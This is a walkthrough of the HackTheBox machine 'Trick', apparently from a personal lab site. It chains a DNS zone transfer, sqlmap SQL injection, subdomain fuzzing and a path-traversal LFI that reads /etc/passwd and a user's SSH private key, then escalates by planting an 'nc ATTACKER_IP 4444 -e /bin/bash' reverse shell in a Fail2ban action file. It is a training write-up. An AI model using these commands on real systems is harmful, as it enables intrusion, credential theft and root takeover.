Home Lab Setup Case 1 Case 2 Case 3 HackTheBox Vulnhub Offsec Proving Grounds

Trick (HTB – Easy)

Trick is a DNS‑focused machine where a zone transfer reveals hidden subdomains. One subdomain contains a SQL‑injectable login form, while another exposes a file inclusion vulnerability that leaks an SSH key. Privilege escalation is achieved by abusing a misconfigured Fail2ban action script to trigger a root reverse shell.

Overview

Target: trick.htb
Initial vector: DNS zone transfer → SQL injection → LFI → SSH key
Privilege escalation: Fail2ban action.d overwrite → root shell

Enumeration

Nmap:

22/tcp ssh
25/tcp smtp
53/tcp dns (BIND)
80/tcp http (nginx)

Add trick.htb to /etc/hosts. Nothing interesting on port 80, so enumerate DNS.

DNS Zone Transfer

$ dig axfr trick.htb @trick.htb

The zone transfer succeeds and reveals a new subdomain: 

preprod-payroll.trick.htb

Add it to /etc/hosts.

Foothold – SQL Injection on preprod-payroll

The login form is vulnerable to SQL injection. Intercept the request (browser devtools or Burp) and feed it to sqlmap: 

$ sqlmap -r request.txt --dbs
-> payroll_db

Dump the users table: 

$ sqlmap -r request.txt -D payroll_db -T users --dump

Credentials allow login, but the panel contains nothing useful. Time to enumerate more subdomains.

Subdomain Discovery

Because preprod-payroll exists, try other “preprod‑” names. Generate a wordlist and fuzz: 

$ wfuzz -H "Host: FUZZ.trick.htb" -w subdomains-top1million-5000.txt http://trick.htb
-> preprod-marketing.trick.htb

Add it to /etc/hosts.

LFI – Extracting michael’s SSH Key

The new subdomain contains a page parameter vulnerable to directory traversal: 

?page=../../../../../../etc/passwd

This reveals user michael. Extract his SSH key: 

?page=../../../../../../home/michael/.ssh/id_rsa

Copy the key, save it locally, and fix permissions: 

$ chmod 600 id_rsa
$ ssh -i id_rsa michael@trick.htb

User shell obtained.

Privilege Escalation – Fail2ban Misconfiguration

Check sudo permissions: 

$ sudo -l
-> (root) NOPASSWD: /etc/init.d/fail2ban restart

Michael belongs to the security group, which has write access to Fail2ban action files: 

/etc/fail2ban/action.d/

Copy an action file to your home directory: 

$ cp /etc/fail2ban/action.d/iptables-multiport.conf ~/

Edit the [actionban] section to include a reverse shell: 

actionban = /usr/bin/nc ATTACKER_IP 4444 -e /bin/bash

Overwrite the original: 

$ mv iptables-multiport.conf /etc/fail2ban/action.d/

Restart Fail2ban:

$ sudo /etc/init.d/fail2ban restart

Trigger the ban by intentionally failing SSH logins: 

$ ssh fakeuser@trick.htb

Listener on attacker: 

$ nc -nlvp 4444

A root shell is received.

Conclusion

Trick is a well‑designed chain: DNS zone transfer → SQL injection → subdomain discovery → LFI → SSH key → Fail2ban misconfiguration → root. It highlights the importance of DNS enumeration and the dangers of insecure automation scripts.